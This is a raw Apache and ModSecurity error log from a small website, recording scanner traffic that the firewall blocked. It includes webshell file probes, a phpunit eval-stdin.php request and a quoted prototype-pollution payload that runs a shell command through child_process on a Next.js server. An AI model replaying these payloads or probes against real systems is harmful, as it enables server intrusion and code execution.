.htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adLnaCj-HYEhJWFlG6EnFAAAAEg"] [Mon Apr 06 01:15:07.504684 2026] [:error] [pid 1306:tid 1322] [client 43.159.148.221:44216] [client 43.159.148.221] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adLs-4RhslBlnapNAUPLEgAAAAU"] [Mon Apr 06 08:30:56.660803 2026] [:error] [pid 31604:tid 31624] [client 49.51.166.228:45874] [client 49.51.166.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adNTIDXL5stF4NaarncOeQAAARE"] [Mon Apr 06 09:15:05.771180 2026] [:error] [pid 31604:tid 31620] [client 43.157.95.239:50092] [client 43.157.95.239] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adNdeTXL5stF4NaarndatwAAAQ0"] [Mon Apr 06 14:24:31.103127 2026] [:error] [pid 19593:tid 19939] [client 184.154.139.52:52258] [client 184.154.139.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adOl_yx7A4s9elWuxzzhlwAAAUU"] [Mon Apr 06 16:02:53.533582 2026] [:error] [pid 30726:tid 30751] [client 20.220.213.131:19405] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/pwnd.php [Mon Apr 06 16:03:01.686398 2026] [:error] [pid 31020:tid 31042] [client 20.220.213.131:19430] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/siteindex.php [Mon Apr 06 16:03:08.521110 2026] [:error] [pid 31020:tid 31036] [client 20.220.213.131:19430] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/fm.php [Mon Apr 06 22:14:46.477116 2026] [:error] [pid 1071:tid 1074] [client 193.32.162.233:49454] [client 193.32.162.233] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "698"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "elavocato.net"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "adQUNtkqWALSouki9aqdjAAAAMA"] [Mon Apr 06 23:09:51.063416 2026] [:error] [pid 15088:tid 15142] [client 20.151.229.110:49634] [client 20.151.229.110] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/php.ini"] [unique_id "adQhH-Khz9OL6f8qX0sbXQAAAI4"] [Tue Apr 07 04:27:49.541461 2026] [:error] [pid 3200:tid 3219] [client 82.26.152.115:39336] [client 82.26.152.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adRrpSdMwfjWBrOSx91TSQAAANE"] [Tue Apr 07 04:27:53.312004 2026] [:error] [pid 11567:tid 11635] [client 82.26.152.115:38442] [client 82.26.152.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adRrqcclMU6S39A1SfarrgAAAQA"] [Tue Apr 07 06:44:51.186551 2026] [autoindex:error] [pid 3061:tid 3076] [client 4.193.168.228:13218] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 08:00:46.123003 2026] [autoindex:error] [pid 3200:tid 3219] [client 62.171.173.178:56184] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Apr 07 08:40:56.574292 2026] [:error] [pid 3200:tid 3209] [client 152.42.230.72:52806] [client 152.42.230.72] ModSecurity: Access denied with code 403 (phase 2). String match "HTTP/1.1" at REQUEST_PROTOCOL. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "399"] [id "960020"] [rev "2"] [msg "Pragma Header requires Cache-Control Header for HTTP/1.1 requests."] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "elavocato.net"] [uri "/wp-login.php"] [unique_id "adSm-CdMwfjWBrOSx92KhwAAAMc"] [Tue Apr 07 10:58:51.843050 2026] [:error] [pid 11567:tid 11662] [client 20.48.232.178:4416] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Apr 07 10:58:51.938097 2026] [:error] [pid 11567:tid 11661] [client 20.48.232.178:4416] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Apr 07 10:59:18.541556 2026] [:error] [pid 11567:tid 11656] [client 20.48.232.178:4216] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Apr 07 11:00:12.346929 2026] [:error] [pid 3200:tid 3203] [client 20.48.232.178:4211] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Apr 07 11:00:23.252635 2026] [:error] [pid 3063:tid 3103] [client 20.48.232.178:4207] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Apr 07 11:00:45.494055 2026] [:error] [pid 11567:tid 11638] [client 20.48.232.178:4163] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Apr 07 13:21:54.134748 2026] [:error] [pid 11567:tid 11646] [client 3.99.127.114:40078] [client 3.99.127.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.elavocato.net"] [uri "/ar"] [unique_id "adTo0sclMU6S39A1SfbDUgAAAQk"] [Tue Apr 07 13:21:54.226988 2026] [:error] [pid 11567:tid 11653] [client 3.99.127.114:40078] [client 3.99.127.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.elavocato.net"] [uri "/ar"] [unique_id "adTo0sclMU6S39A1SfbDVAAAAQ8"] [Tue Apr 07 13:21:54.326681 2026] [:error] [pid 11567:tid 11643] [client 3.99.127.114:40078] [client 3.99.127.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.elavocato.net"] [uri "/ar"] [unique_id "adTo0sclMU6S39A1SfbDVgAAAQY"] [Tue Apr 07 16:33:41.101907 2026] [autoindex:error] [pid 11567:tid 11656] [client 62.197.144.51:29758] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 16:33:42.019967 2026] [autoindex:error] [pid 11567:tid 11653] [client 62.197.144.51:29758] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 16:33:42.081751 2026] [autoindex:error] [pid 11567:tid 11648] [client 62.197.144.51:29758] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 16:33:44.484197 2026] [autoindex:error] [pid 11567:tid 11653] [client 62.197.144.51:29758] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 16:33:46.461611 2026] [autoindex:error] [pid 11567:tid 11661] [client 62.197.144.51:29758] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 16:33:48.963417 2026] [autoindex:error] [pid 3200:tid 3204] [client 62.197.144.51:39748] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 17:25:03.280552 2026] [:error] [pid 11567:tid 11664] [client 34.231.156.59:47726] [client 34.231.156.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adUhz8clMU6S39A1Sfa_cgAAARg"] [Tue Apr 07 19:30:15.120834 2026] [:error] [pid 3063:tid 3119] [client 85.208.96.193:56694] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adU_J78uAi1Jl3jV3GZDywAAAFA"] [Tue Apr 07 19:59:17.768321 2026] [:error] [pid 11567:tid 11655] [client 185.191.171.13:16806] [client 185.191.171.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVF9cclMU6S39A1SfblhAAAARA"] [Tue Apr 07 19:59:45.372133 2026] [:error] [pid 11567:tid 11643] [client 185.170.167.18:18410] [client 185.170.167.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVGEcclMU6S39A1SfbmYgAAAQY"] [Tue Apr 07 20:33:11.829184 2026] [autoindex:error] [pid 3200:tid 3216] [client 89.117.41.86:57012] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 20:33:17.261692 2026] [autoindex:error] [pid 3200:tid 3205] [client 89.117.41.86:57012] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 20:33:17.680606 2026] [autoindex:error] [pid 3200:tid 3213] [client 89.117.41.86:57012] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 20:33:33.587151 2026] [autoindex:error] [pid 3200:tid 3216] [client 89.117.41.86:57012] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 20:33:47.162250 2026] [autoindex:error] [pid 3200:tid 3217] [client 89.117.41.86:57012] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex 